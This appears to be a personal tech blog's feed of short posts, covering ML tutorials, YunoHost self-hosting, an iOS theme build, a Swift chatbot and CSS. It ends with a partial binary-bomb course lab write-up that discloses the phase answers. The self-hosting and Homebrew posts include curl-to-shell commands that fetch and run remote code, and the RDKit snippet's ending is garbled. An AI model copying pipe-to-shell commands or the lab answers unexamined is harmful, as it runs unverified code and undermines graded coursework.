coefficient4 = sess.run(d)
coefficient5 = sess.run(e)
constant = sess.run(f)
Epoch 1000 : Training Cost: 1409200100.0 a,b,c,d,e,f: 7.949472 7.46219 55.626034 184.29028 484.00223 1024.0083
Epoch 2000 : Training Cost: 1306882400.0 a,b,c,d,e,f: 8.732181 -4.0085897 73.25298 315.90103 904.08887 2004.9749
Epoch 3000 : Training Cost: 1212606000.0 a,b,c,d,e,f: 9.732249 -16.90125 86.28379 437.06552 1305.055 2966.2188
Epoch 4000 : Training Cost: 1123640400.0 a,b,c,d,e,f: 10.74851 -29.82692 98.59997 555.331 1698.4631 3917.9155
Epoch 5000 : Training Cost: 1039694300.0 a,b,c,d,e,f: 11.75426 -42.598194 110.698326 671.64355 2085.5513 4860.8535
Epoch 6000 : Training Cost: 960663550.0 a,b,c,d,e,f: 12.745439 -55.18337 122.644936 786.00214 2466.1638 5794.3735
Epoch 7000 : Training Cost: 886438340.0 a,b,c,d,e,f: 13.721028 -67.57168 134.43822 898.3691 2839.9958 6717.659
Epoch 8000 : Training Cost: 816913100.0 a,b,c,d,e,f: 14.679965 -79.75113 146.07385 1008.66895 3206.6692 7629.812
Epoch 9000 : Training Cost: 751971500.0 a,b,c,d,e,f: 15.62181 -91.71608 157.55713 1116.7715 3565.8323 8529.976
Epoch 10000 : Training Cost: 691508740.0 a,b,c,d,e,f: 16.545347 -103.4531 168.88321 1222.6348 3916.9785 9416.236
Epoch 11000 : Training Cost: 635382000.0 a,b,c,d,e,f: 17.450052 -114.954254 180.03932 1326.1565 4259.842 10287.99
Epoch 12000 : Training Cost: 583477250.0 a,b,c,d,e,f: 18.334944 -126.20821 191.02948 1427.2095 4593.8 11143.449
Epoch 13000 : Training Cost: 535640400.0 a,b,c,d,e,f: 19.198917 -137.20206 201.84718 1525.6926 4918.5327 11981.633
Epoch 14000 : Training Cost: 491722240.0 a,b,c,d,e,f: 20.041153 -147.92719 212.49709 1621.5496 5233.627 12800.468
Epoch 15000 : Training Cost: 451559520.0 a,b,c,d,e,f: 20.860966 -158.37456 222.97133 1714.7141 5538.676 13598.337
Epoch 16000 : Training Cost: 414988960.0 a,b,c,d,e,f: 21.657421 -168.53406 233.27422 1805.0874 5833.1978 14373.658
Epoch 17000 : Training Cost: 381837920.0 a,b,c,d,e,f: 22.429693 -178.39536 243.39914 1892.5883 6116.847 15124.394
Epoch 18000 : Training Cost: 351931300.0 a,b,c,d,e,f: 23.176882 -187.94789 253.3445 1977.137 6389.117 15848.417
Epoch 19000 : Training Cost: 325074400.0 a,b,c,d,e,f: 23.898485 -197.18741 263.12512 2058.6716 6649.8037 16543.95
Epoch 20000 : Training Cost: 301073570.0 a,b,c,d,e,f: 24.593851 -206.10497 272.72385 2137.1797 6898.544 17209.367
Epoch 21000 : Training Cost: 279727000.0 a,b,c,d,e,f: 25.262104 -214.69217 282.14642 2212.6372 7135.217 17842.854
Epoch 22000 : Training Cost: 260845550.0 a,b,c,d,e,f: 25.903376 -222.94969 291.4003 2284.9844 7359.4644 18442.408
Epoch 23000 : Training Cost: 244218030.0 a,b,c,d,e,f: 26.517094 -230.8697 300.45532 2354.3003 7571.261 19007.49
Epoch 24000 : Training Cost: 229660080.0 a,b,c,d,e,f: 27.102589 -238.44817 309.35342 2420.4185 7770.5728 19536.19
Epoch 25000 : Training Cost: 216972400.0 a,b,c,d,e,f: 27.660324 -245.69016 318.10062 2483.3608 7957.354 20027.707
216972400.0 27.660324 -245.69016 318.10062 2483.3608 7957.354 20027.707
predictions = []
for x in abscissa:
predictions.append((coefficient1*pow(x,5) + coefficient2*pow(x,4) + coefficient3*pow(x,3) + coefficient4*pow(x,2) + coefficient5*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Quintic Regression Result')
plt.legend()
plt.show()
You just learnt Polynomial Regression using TensorFlow!
Overfitting refers to a model that models the training data too well. Overfitting happens when a model learns the detail and noise in the training data to the extent that it negatively impacts the performance of the model on new data. This means that the noise or random fluctuations in the training data is picked up and learned as concepts by the model. The problem is that these concepts do not apply to new data and negatively impact the models ability to generalise.
Source: Machine Learning Mastery
Basically if you train your machine learning model on a small dataset for a really large number of epochs, the model will learn all the deformities/noise in the data and will actually think that it is a normal part. Therefore when it will see some new data, it will discard that new data as noise and will impact the accuracy of the model in a negative manner
]]>Made for Google Code-In
Task Description
Using Glitch and the Teachable Machines, build a Book Detector with Tensorflow.js. When a book is recognized, the code would randomly suggest a book/tell a famous quote from a book. Here is an example Project to get you started: https://glitch.com/~voltaic-acorn
1) Collecting Data
Teachable Machine allows you to create your dataset just by using your webcam! I created a database consisting of three classes ( Three Books ) and approximately grabbed 100 pictures for each book/class
2) Training
Training on teachable machines is as simple as clicking the train button. I did not even have to modify any configurations.
3) Finding Labels
Because I originally entered the entire name of the book and it's author's name as the label, the class name got truncated (Note to self, use shorter class names :p ). I then modified the code to print the modified label names in an alert box.
4) Adding a suggestions function
I first added a text field on the main page and then modified the JavaScript file to suggest a similar book whenever the model predicted with an accuracy >= 98%
5) Running!
Here it is running!
Remix this project:-
https://luminous-opinion.glitch.me
]]>The standard form of a quadratic equation is:
Here, , and
We begin by first dividing both sides by the coefficient
We can rearrange the equation:
We can then use the method of completing the square. (Maths is Fun has a really good explanation for this technique)
On our LHS, we can clearly recognize that it is the expanded form of i.e
Taking the square root of both sides
This gives you the world famous quadratic formula:
]]>With all these data leaks happening every other day, why have you not started self-hosting?
The title refers to the “Y U No Host” internet meme, which led to the name of “YunoHost”, an operating system aiming to democratise self-hosting. This post tries to discuss the idea that anyone can self-host and why you should consider YunoHost.
These are just some of the reasons to self-host.
No one is born with the knowledge of knowing how to orchestrate a cluster. You can always learn how to, but sometimes you just don’t have the time or energy. YunoHost tries to ease this issue by providing a clean web-interface. You do not even need to touch the command line for all the basic tasks.
Anything and everything! The best part about self-hosting is that you own the data. This data is not going to be sold to the highest bidder.
Just because you like watching YouTube does not mean you cannot self-host a privacy friendly front-end for it on your server. Why stop there, why not create your own Google Drive / Dropbox alternative and host it on your own with actual unlimited storage, where the only limit is how much capacity you want. Do you own tons of audiobooks or DVDs/Blu-rays? Simply host an audiobook server or create your own personal Netflix and share it with your friends and family.
Do you own a small-business? Do you hate the idea of having your sensitive e-mails stored on someone else’s server? Why not setup your own mail server, with contacts and calendar syncing.
Do you run a small hobby group? Why not host a forum for everyone to discuss on? Or, simply a chat server where everyone can hop on and text, or call.
Although you can do all of this (and much more!) without needing to use YunoHost, it just makes it easy to manage.
YunoHost is a server operating system which takes guesswork out of Self-Hosting. Out of the box it provides:
and much more!
I began my self-hosting journey with a Raspberry Pi 4 (4GB). I looked at tons of options for the base management layer:
One look at the user portal and I was sold. Yep, more than the features it was the app screen which looked like elements from the periodic table which sold me on the idea of using YunoHost.
Although there is no “correct“ way to self-host, YunoHost is indeed an easier way.
The stock Raspberry Pi image provided by YunoHost meant you don’t run in full arm64 mode. I had to first install Debian and then install YunoHost to get full arm64 goodness.
Setting up the domain was as painless as following the online web admin diagnosis page to copy paste DNS records.
The easiest way to deploy any app is to use Docker. I dislike this approach for a variety of reasons but I am not going to cover them here. All YunoHost apps are packaged to run on bare-metal for the best performance. See an app that does not have pre-compiled binaries? The package installer will download the latest source, install dependencies, compile, and then clean all the unnecessary files. Because you are running Debian after all, you can always SSH into the server and install docker if you want to. You can even install Portainer through YunoHost’s app catalogue if you really want to.
Also, YunoHost has been here for a long time! Here is an old Hacker News post about YunoHost. All the projects mentioned in the comments? Dead.
curl https://install.yunohost.org | bash
Done!
Highly context dependent. I run two YunoHost servers in two different locations. One of the ISP has actually blacklisted the residential IP address range and does not let me change my reverseDNS, which means all my outgoing emails are marked as spam. On the other hand, the other ISP gave a clean static IP and the server managed for a small business is not at all problematic for emailing. YMMV but at least you know you have an option.
]]>I had a pack of NFC cards and decided it was the perfect time to create Music Cards. I do not have a "music setup." So, I did not have to ensure this could work with any device. I settled with using Shortcuts personal Automation.
I tried measuring the card's dimensions with the in-built Measure app, but it was off by a few mm.
After measuring with a scale, I decided on a simple template I made in Apple Pages.
I created a personal automation in the Shortcuts app which got triggered when a particular NFC card was scanned, ask playback destination and play the album/playlist.
Note: Without the proper folder structure, your theme may not show up!
themeName.theme
(Replace themeName with your desired theme name)themeName.theme
folder, create another folder called IconBundles
(You cannot change this name)themeName.theme
folder, create a file called Info.plist
and paste the following<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>PackageName</key>
<string>ThemeName</string>
<key>ThemeType</key>
<string>Icons</string>
</dict>
</plist>
PackageName
with the name of the Package and replace ThemeName
with the Theme NameNow, you might ask what is the difference between PackageName
and ThemeName
?
Well, if for example you want to publish two variants of your icons, one dark and one white but you do not want the user to separately install them.
Then, you would name the package MyTheme
and include two themes Blackie
and White
thus creating two entries. More about this in the end
Note: Due to IconBundles, we just need to create the icons in one size and they get resized automatically :ghost:
Want to create rounded icons? Create them squared only, we will learn how to apply masks!
Note: All icons must be saved as *.png
(Tip: This means you can even create partially transparent icons!)
themeName.theme>IconBundles
as bundleID-large.png
Stock Application BundleIDs
Name | BundleID |
---|---|
App Store | com.apple.AppStore |
Apple Watch | com.apple.Bridge |
Calculator | com.apple.calculator |
Calendar | com.apple.mobilecal |
Camera | com.apple.camera |
Classroom | com.apple.classroom |
Clock | com.apple.mobiletimer |
Compass | com.apple.compass |
FaceTime | com.apple.facetime |
Files | com.apple.DocumentsApp |
Game Center | com.apple.gamecenter |
Health | com.apple.Health |
Home | com.apple.Home |
iBooks | com.apple.iBooks |
iTunes Store | com.apple.MobileStore |
com.apple.mobilemail | |
Maps | com.apple.Maps |
Measure | com.apple.measure |
Messages | com.apple.MobileSMS |
Music | com.apple.Music |
News | com.apple.news |
Notes | com.apple.mobilenotes |
Phone | com.apple.mobilephone |
Photo Booth | com.apple.Photo-Booth |
Photos | com.apple.mobileslideshow |
Playgrounds | come.apple.Playgrounds |
Podcasts | com.apple.podcasts |
Reminders | com.apple.reminders |
Safari | com.apple.mobilesafari |
Settings | com.apple.Preferences |
Stocks | com.apple.stocks |
Tips | com.apple.tips |
TV | com.apple.tv |
Videos | com.apple.videos |
Voice Memos | com.apple.VoiceMemos |
Wallet | com.apple.Passbook |
Weather | com.apple.weather |
3rd Party Applications BundleID Click here
In your Info.plist
file add the following value between <dict>
and
<key>IB-MaskIcons</key>
<true/>
NOTE: This is an optional step, if you do not want Icon Masks, skip this step
themeName.theme
folder, create another folder called 'Bundles'
Bundles
create another folder called com.apple.mobileicons.framework
Masking does not support IconBundles, therefore you need to save the masks for each of the following
File | Resolution |
---|---|
AppIconMask@2x~ipad.png | 152x512 |
AppIconMask@2x~iphone.png | 120x120 |
AppIconMask@3x~ipad.png | 180x180 |
AppIconMask@3x~iphone.png | 180x180 |
AppIconMask~ipad.png | 76x76 |
DocumentBadgeMask-20@2x.png | 40x40 |
DocumentBadgeMask-145@2x.png | 145x145 |
GameAppIconMask@2x.png | 84x84 |
NotificationAppIconMask@2x.png | 40x40 |
NotificationAppIconMask@3x.png | 60x60 |
SpotlightAppIconMask@2x.png | 80x80 |
SpotlightAppIconMask@3x.png | 120x120 |
TableIconMask@2x.png | 58x58 |
TableIconOutline@2x.png | 58x58 |
Example (Credits: Pinpal):
would result in
themeName.theme
with the name you want to be shown on Cydia, e.g themeNameForCydia
DEBIAN
in themeNameForCydia
(It needs to be uppercase)DEBIAN
create an extension-less file called control
and edit it using your favourite text editorPaste the following in it, replacing yourname
, themename
, Theme Name
, A theme with beautiful icons!
and Your Name
with your details:
Package: com.yourname.themename
Name: Theme Name
Version: 1.0
Architecture: iphoneos-arm
Description: A theme with beautiful icons!
Author: Your Name
Maintainer: Your Name
Section: Themes
Important Notes:
Now, Create another folder called Library
in themeNameForCydia
Library
create another folder called Themes
themeName.theme
to the Themes
folder (Copy the entire folder, not just the contents)For building the deb you need a *nix
system, otherwise you can build it using your iPhones
1) Install Homenbrew /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
(Run this in the terminal)
2) Install dpkg, by running brew install dpkg
There is a terrible thing called .DS_Store which if not removed, will cause a problem during either build or installation
To remove this we first need to open the folder in the terminal
Launch the Terminal and then drag-and-drop the 'themeNameForCydia' folder on the Terminal icon in the dock
find . -name "*.DS_Store" -type f -delete
themeNameForCyia
folder on the terminalthemeNameForCydia
ls
should show the following outputDEBIAN Library
cd .. && dpkg -b themeNameForCydia
Now you will have the themeNameForCydia.deb
in the same directory
You can share this with your friends :+1:
]]>I was trying to install AmberTools on my macOS Catalina Installation. Running ./configure -macAccelerate clang
gave me an error that it could not find X11 libraries, even though locate libXt
showed that my installation was correct.
Error:
Could not find the X11 libraries; you may need to edit config.h
to set the XHOME and XLIBS variables.
Error: The X11 libraries are not in the usual location !
To search for them try the command: locate libXt
On new Fedora OS's install the libXt-devel libXext-devel
libX11-devel libICE-devel libSM-devel packages.
On old Fedora OS's install the xorg-x11-devel package.
On RedHat OS's install the XFree86-devel package.
On Ubuntu OS's install the xorg-dev and xserver-xorg packages.
...more info for various linuxes at ambermd.org/ubuntu.html
To build Amber without XLEaP, re-run configure with '-noX11:
./configure -noX11 --with-python /usr/local/bin/python3 -macAccelerate clang
Configure failed due to the errors above!
I searched on Google for a solution. Sadly, there was not even a single thread which had a solution about this error.
Simply reinstalling XQuartz using homebrew fixed the error brew cask reinstall xquartz
If you do not have XQuartz installed, you need to run brew cask install xquartz
A chatbot/virtual assistant, on paper, looks easy to build. The user says something, the programs finds the best action, checks if additional input is required and sends back the output. To do this in Swift, I used two separate ML Models created using Apple's Create ML App. First is a Text Classifier to classify intent, and the other a word tagger for extracting input from the input message. Disclaimer: This is a very crude proof-of-concept, but it does work.
I opened a CSV file and added some sample entries, with a corresponding label.
text,label
hey there,greetings
hello,greetings
good morning,greetings
good evening,greetings
hi,greetings
open the pod bay doors,banter
who let the dogs out,banter
ahh that's hot,banter
bruh that's rad,banter
nothing,banter
da fuq,banter
can you tell me details about the compound aspirin,deez-drug
i want to know about some compounds,deez-drug
search about the compound,deez-drug
tell me about the molecule,deez-drug
tell me about something,banter
tell me something cool,banter
tell a joke,banter
make me a sandwich,banter
whatcha doing,greetings
i love you,banter
This is useful to extract the required variables directly from the user's input. This model will be only called if the intent from the classifier is a custom action. I created a sample JSON with only 3 examples (I know, very less, but works for a crude PoC).
[
{
"tokens": ["Tell","me","about","the","drug","Aspirin","."],
"labels": ["NONE","NONE","NONE","NONE","NONE","COMPOUND","NONE"]
},
{
"tokens": ["Please","tell","me","information","about","the","compound","salicylic","acid","."],
"labels": ["NONE","NONE","NONE","NONE","NONE","NONE","NONE","COMPOUND","COMPOUND","NONE"]
},
{
"tokens": ["Information","about","the","compound","Ibuprofen","please","."],
"labels": ["NONE","NONE","NONE","NONE","COMPOUND","NONE","NONE"]
}
]
The initial part is easy, importing CoreML and NaturalLanguage and then initializing the models and the tagger.
import CoreML
import NaturalLanguage
let mlModelClassifier = try IntentDetection_1(configuration: MLModelConfiguration()).model
let mlModelTagger = try CompoundTagger(configuration: MLModelConfiguration()).model
let intentPredictor = try NLModel(mlModel: mlModelClassifier)
let tagPredictor = try NLModel(mlModel: mlModelTagger)
let tagger = NLTagger(tagSchemes: [.nameType, NLTagScheme("Apple")])
tagger.setModels([tagPredictor], forTagScheme: NLTagScheme("Apple"))
Now, we define a simple structure which the custom function(s) can use to access the provided input. It can also be used to hold additional variables. This custom action for our third label, uses the Word Tagger model to check for the compound in the user's message. If it is present then it displays the name, otherwise it tells the user that they have not provided the input. The latter can be replaced with a function which asks the user for the input.
struct User {
static var message = ""
}
func customAction() -> String {
let sampleMessage = User.message
var actionable_item = ""
tagger.string = sampleMessage
tagger.enumerateTags(in: sampleMessage.startIndex..<sampleMessage.endIndex, unit: .word,
scheme: NLTagScheme("Apple"), options: .omitWhitespace) { tag, tokenRange in
if let tag = tag {
if tag.rawValue == "COMPOUND" {
actionable_item += sampleMessage[tokenRange]
}
}
return true
}
if actionable_item == "" {
return "You did not provide any input"
} else {
return "You provided input \(actionable_item) for performing custom action"
}
}
Sometimes, no action needs to be performed, and the bot can use a predefined set of responses. Otherwise, if an action is required, it can call the custom action.
let defaultResponses = [
"greetings": "Hello",
"banter": "no, plix no"
]
let customActions = [
"deez-drug": customAction
]
In the sample input, the program is updating the User.message and checking if it has a default response. Otherwise, it calls the custom action.
let sampleMessages = [
"Hey there, how is it going",
"hello, there",
"Who let the dogs out",
"can you tell me about the compound Geraniin",
"what do you know about the compound Ibuprofen",
"please, tell me more about the compound",
"please, tell me more about the molecule dihydrogen-monoxide"
]
for sampleMessage in sampleMessages {
User.message = sampleMessage
let prediction = intentPredictor.predictedLabel(for: sampleMessage)
if (defaultResponses[prediction!] != nil) {
print(defaultResponses[prediction!]!)
} else if (customActions[prediction!] != nil) {
print(customActions[prediction!]!())
}
}
So easy.
If I ever release a part-2, it will either be about implementing this in Tensorflow.JS or an iOS app using SwiftUI ;)
]]>I know that the title is a bit weird. I was trying to interact with a video under an iPhone Bezel Screen frame.
<div class="row-span-2 md:col-span-1 rounded-xl border-2 border-slate-400/10 bg-neutral-100 p-4 dark:bg-neutral-900">
<div class="content flex flex-wrap content-center justify-center">
<img src="iphone-12-white.png" class="h-[60vh] z-10 absolute">
<!--<img src="screenshot2.jpeg" class="h-[57vh] mt-4 mr-1 rounded-[2rem]">-->
<video src="screenrec.mp4" class="h-[57vh] mt-4 mr-1 rounded-[2rem]" controls muted autoplay></video>
</div>
</div>
Turns out, you can disable pointer events!
In Tailwind, it is as simple as adding pointer-events-none
to the bezel screen.
In CSS, this can be done by:
.className {
pointer-events: none
}
Let us try this in a simple example.
Here, we create a button and overlay a transparent box
<div style="height: 200px; width: 300px; background-color: rgba(255, 0, 0, 0.4); z-index: 2; position: absolute;">
A box with 200px height and 200px width
</div>
<button style="z-index: 1; margin-top: 20px; margin-bottom: 200px;" onclick="alert('You were able to click this button')">Try clicking me</button>
As you can see, you cannot click the button because the red box comes in the way. We can fix this by adding pointer-events: none
to the box.
<div style="height: 200px; width: 300px; background-color: rgba(0, 255, 0, 0.4); z-index: 2; position: absolute; pointer-events: none;">
A box with 200px height and 300px width
</div>
<button style="z-index: 1; margin-top: 20px; margin-bottom: 200px" onclick="alert('You were able to click this button')">Try clicking me</button>
</div>
]]>
This was tested on TF 2.x and works as of 2019-12-10
If you want to understand how to make your own custom image classifier, please refer to my previous post.
If you followed my last post, then you created a model which took an image of dimensions 50x50 as an input.
First we import the following if we have not imported these before
import cv2
import os
Then we read the file using OpenCV.
image=cv2.imread(imagePath)
The cv2. imread() function returns a NumPy array representing the image. Therefore, we need to convert it before we can use it.
image_from_array = Image.fromarray(image, 'RGB')
Then we resize the image
size_image = image_from_array.resize((50,50))
After this we create a batch consisting of only one image
p = np.expand_dims(size_image, 0)
We then convert this uint8 datatype to a float32 datatype
img = tf.cast(p, tf.float32)
Finally we make the prediction
print(['Infected','Uninfected'][np.argmax(model.predict(img))])
Infected
Update: March 2024
rdkit-pypi
has been deprecated in favour of rdkit
You can simply run:
!pip install rdkit
EDIT: Try installing RDKit using pip
!pip install rdkit-pypi
RDKit is one of the most integral part of any Cheminfomatic specialist's toolkit but it is notoriously difficult to install unless you already have conda
installed. I originally found this in a GitHub Gist but I have not been able to find that gist again :/
Just copy and paste this in a Colab cell and it will install it 👍
import sys
import os
import requests
import subprocess
import shutil
from logging import getLogger, StreamHandler, INFO
logger = getLogger(__name__)
logger.addHandler(StreamHandler())
logger.setLevel(INFO)
def install(
chunk_size=4096,
file_name="Miniconda3-latest-Linux-x86_64.sh",
url_base="https://repo.continuum.io/miniconda/",
conda_path=os.path.expanduser(os.path.join("~", "miniconda")),
rdkit_version=None,
add_python_path=True,
force=False):
"""install rdkit from miniconda
import rdkit_installer
rdkit_installer.install()
```
"""
python_path = os.path.join(
conda_path,
"lib",
"python{0}.{1}".format(*sys.version_info),
"site-packages",
)
if add_python_path and python_path not in sys.path:
logger.info("add {} to PYTHONPATH".format(python_path))
sys.path.append(python_path)
if os.path.isdir(os.path.join(python_path, "rdkit")):
logger.info("rdkit is already installed")
if not force:
return
logger.info("force re-install")
url = url_base + file_name
python_version = "{0}.{1}.{2}".format(*sys.version_info)
logger.info("python version: {}".format(python_version))
if os.path.isdir(conda_path):
logger.warning("remove current miniconda")
shutil.rmtree(conda_path)
elif os.path.isfile(conda_path):
logger.warning("remove {}".format(conda_path))
os.remove(conda_path)
logger.info('fetching installer from {}'.format(url))
res = requests.get(url, stream=True)
res.raise_for_status()
with open(file_name, 'wb') as f:
for chunk in res.iter_content(chunk_size):
f.write(chunk)
logger.info('done')
logger.info('installing miniconda to {}'.format(conda_path))
subprocess.check_call(["bash", file_name, "-b", "-p", conda_path])
logger.info('done')
logger.info("installing rdkit")
subprocess.check_call([
os.path.join(conda_path, "bin", "conda"),
"install",
"--yes",
"-c", "rdkit",
"python=={}".format(python_version),
"rdkit" if rdkit_version is None else "rdkit=={}".format(rdkit_version)])
logger.info("done")
import rdkit
logger.info("rdkit-{} installation finished!".format(rdkit.__version__))
if name == "main": install() ```
]]>Lab 2 for CSCI 2400 @ CU Boulder - Computer Systems
The nefarious Dr. Evil has planted a slew of “binary bombs” on our class machines. A binary bomb is a program that consists of a sequence of phases. Each phase expects you to type a particular string on stdin. If you type the correct string, then the phase is defused and the bomb proceeds to the next phase. Otherwise, the bomb explodes by printing "BOOM!!!" and then terminating. The bomb is defused when every phase has been defused.
There are too many bombs for us to deal with, so we are giving each student a bomb to defuse. Your mission, which you have no choice but to accept, is to defuse your bomb before the due date. Good luck, and welcome to the bomb squad! Bomb Lab Handout
I like using objdump to disassemble the code and get a broad overview of what is happening before I start.
objdump -d bomb > dis.txt
Note: I am not sure about the history of the bomb lab. I think it started at CMU.
joxxxn@jupyter-nxxh6xx8:~/lab2-bomblab-navanchauhan/bombbomb$ gdb -ex 'break phase_1' -ex 'break explode_bomb' -ex 'run' ./bomb
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./bomb...
Breakpoint 1 at 0x15c7
Breakpoint 2 at 0x1d4a
Starting program: /home/joxxxn/lab2-bomblab-navanchauhan/bombbomb/bomb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
test string
Breakpoint 1, 0x00005555555555c7 in phase_1 ()
(gdb) dias phase_1
Undefined command: "dias". Try "help".
(gdb) disas phase_1
Dump of assembler code for function phase_1:
=> 0x00005555555555c7 <+0>: endbr64
0x00005555555555cb <+4>: sub $0x8,%rsp
0x00005555555555cf <+8>: lea 0x1b7a(%rip),%rsi # 0x555555557150
0x00005555555555d6 <+15>: call 0x555555555b31 <strings_not_equal>
0x00005555555555db <+20>: test %eax,%eax
0x00005555555555dd <+22>: jne 0x5555555555e4 <phase_1+29>
0x00005555555555df <+24>: add $0x8,%rsp
0x00005555555555e3 <+28>: ret
0x00005555555555e4 <+29>: call 0x555555555d4a <explode_bomb>
0x00005555555555e9 <+34>: jmp 0x5555555555df <phase_1+24>
End of assembler dump.
(gdb) print 0x555555557150
$1 = 93824992244048
(gdb) x/1s 0x555555557150
0x555555557150: "Controlling complexity is the essence of computer programming."
(gdb)
Phase 1 defused. How about the next one?
1 2 3 4 5 6
Breakpoint 1, 0x00005555555555eb in phase_2 ()
(gdb) disas
Dump of assembler code for function phase_2:
=> 0x00005555555555eb <+0>: endbr64
0x00005555555555ef <+4>: push %rbp
0x00005555555555f0 <+5>: push %rbx
0x00005555555555f1 <+6>: sub $0x28,%rsp
0x00005555555555f5 <+10>: mov %rsp,%rsi
0x00005555555555f8 <+13>: call 0x555555555d97 <read_six_numbers>
0x00005555555555fd <+18>: cmpl $0x0,(%rsp)
0x0000555555555601 <+22>: js 0x55555555560d <phase_2+34>
0x0000555555555603 <+24>: mov %rsp,%rbp
0x0000555555555606 <+27>: mov $0x1,%ebx
0x000055555555560b <+32>: jmp 0x555555555620 <phase_2+53>
0x000055555555560d <+34>: call 0x555555555d4a <explode_bomb>
0x0000555555555612 <+39>: jmp 0x555555555603 <phase_2+24>
0x0000555555555614 <+41>: add $0x1,%ebx
0x0000555555555617 <+44>: add $0x4,%rbp
0x000055555555561b <+48>: cmp $0x6,%ebx
0x000055555555561e <+51>: je 0x555555555631 <phase_2+70>
0x0000555555555620 <+53>: mov %ebx,%eax
0x0000555555555622 <+55>: add 0x0(%rbp),%eax
0x0000555555555625 <+58>: cmp %eax,0x4(%rbp)
0x0000555555555628 <+61>: je 0x555555555614 <phase_2+41>
0x000055555555562a <+63>: call 0x555555555d4a <explode_bomb>
0x000055555555562f <+68>: jmp 0x555555555614 <phase_2+41>
0x0000555555555631 <+70>: add $0x28,%rsp
0x0000555555555635 <+74>: pop %rbx
0x0000555555555636 <+75>: pop %rbp
0x0000555555555637 <+76>: ret
End of assembler dump.
(gdb)
0x00005555555555fd <+18>: cmpl $0x0,(%rsp)
0x0000555555555601 <+22>: js 0x55555555560d <phase_2+34>
...
0x000055555555560d <+34>: call 0x555555555d4a <explode_bomb>
The program first compares if the first number is not 0. If the number is not 0, then the cmpl
instruction returns a negative value. The js
instruction stands for jump if sign -> causing a jump to the specified address if the sign bit is set. This would result in the explode_bomb function being called.
0x0000555555555603 <+24>: mov %rsp,%rbp
0x0000555555555606 <+27>: mov $0x1,%ebx
%rsp
in x86-64 asm, is the stack pointer i.e. it points to the top of the current stack frame. Since the program just read six numbers, the top of the stack (%rsp
) contains the address of the first number.
By executing mov %rsp,%rbp
we are setting the base pointer (%rbp
) to point to this address.
Now, for the second instruction mov $0x1,%ebx
, we are initialising the %ebx
register with the value 1. Based on the assembly code, you can see that this is being used as a counter/index for the loop.
0x000055555555560b <+32>: jmp 0x555555555620 <phase_2+53>
The program now jumps to
0x0000555555555620 <+53>: mov %ebx,%eax
0x0000555555555622 <+55>: add 0x0(%rbp),%eax
0x0000555555555625 <+58>: cmp %eax,0x4(%rbp)
0x0000555555555628 <+61>: je 0x555555555614 <phase_2+41>
Here, the value from %ebx
is copied to the %eax
register. For this iteration, the value should be 1.
Then, the value at the memory location pointed by %rbp
is added to the value in %eax
. For now, 0 is added (the first number that we read).
cmp %eax,0x4(%rbp)
- The instruction compares the value in %eax to the value at the memory address %rbp + 4
. Since Integers in this context are stored using a word of memory of 4 bytes, this indicates it checks against the second number in the sequence.
je 0x555555555614 <phase_2+41>
- The program will jump to phase_2+41
if the previous cmp
instruction determined the values as equal.
0x0000555555555614 <+41>: add $0x1,%ebx
0x0000555555555617 <+44>: add $0x4,%rbp
0x000055555555561b <+48>: cmp $0x6,%ebx
0x000055555555561e <+51>: je 0x555555555631 <phase_2+70>
0x0000555555555620 <+53>: mov %ebx,%eax
0x0000555555555622 <+55>: add 0x0(%rbp),%eax
0x0000555555555625 <+58>: cmp %eax,0x4(%rbp)
0x0000555555555628 <+61>: je 0x555555555614 <phase_2+41>
Here, we can see that the program increments %ebx
by 1, adds a 4 byte offset to %rbp
(the number we will be matching now), and checks if %ebx
is equal to 6. If it is, it breaks the loop and jumps to <phase_2+70>
successfully finishing this stage.
Now, given that we know the first two numbers in the sequence are 0 1
, we can calculate the other numbers by following the pattern of adding the counter and the value of the previous number.
Thus,
...
Phase 1 defused. How about the next one?
0 1 3 6 10 15
Breakpoint 1, 0x00005555555555eb in phase_2 ()
(gdb) continue
Continuing.
That's number 2. Keep going!
Let us look at the disassembled code first
0000000000001638 <phase_3>:
1638: f3 0f 1e fa endbr64
163c: 48 83 ec 18 sub $0x18,%rsp
1640: 48 8d 4c 24 07 lea 0x7(%rsp),%rcx
1645: 48 8d 54 24 0c lea 0xc(%rsp),%rdx
164a: 4c 8d 44 24 08 lea 0x8(%rsp),%r8
164f: 48 8d 35 60 1b 00 00 lea 0x1b60(%rip),%rsi # 31b6 <_IO_stdin_used+0x1b6>
1656: b8 00 00 00 00 mov $0x0,%eax
165b: e8 80 fc ff ff call 12e0 <__isoc99_sscanf@plt>
1660: 83 f8 02 cmp $0x2,%eax
1663: 7e 20 jle 1685 <phase_3+0x4d>
1665: 83 7c 24 0c 07 cmpl $0x7,0xc(%rsp)
166a: 0f 87 0d 01 00 00 ja 177d <phase_3+0x145>
1670: 8b 44 24 0c mov 0xc(%rsp),%eax
1674: 48 8d 15 55 1b 00 00 lea 0x1b55(%rip),%rdx # 31d0 <_IO_stdin_used+0x1d0>
167b: 48 63 04 82 movslq (%rdx,%rax,4),%rax
167f: 48 01 d0 add %rdx,%rax
1682: 3e ff e0 notrack jmp *%rax
1685: e8 c0 06 00 00 call 1d4a <explode_bomb>
168a: eb d9 jmp 1665 <phase_3+0x2d>
168c: b8 63 00 00 00 mov $0x63,%eax
1691: 81 7c 24 08 3d 02 00 cmpl $0x23d,0x8(%rsp)
1698: 00
1699: 0f 84 e8 00 00 00 je 1787 <phase_3+0x14f>
169f: e8 a6 06 00 00 call 1d4a <explode_bomb>
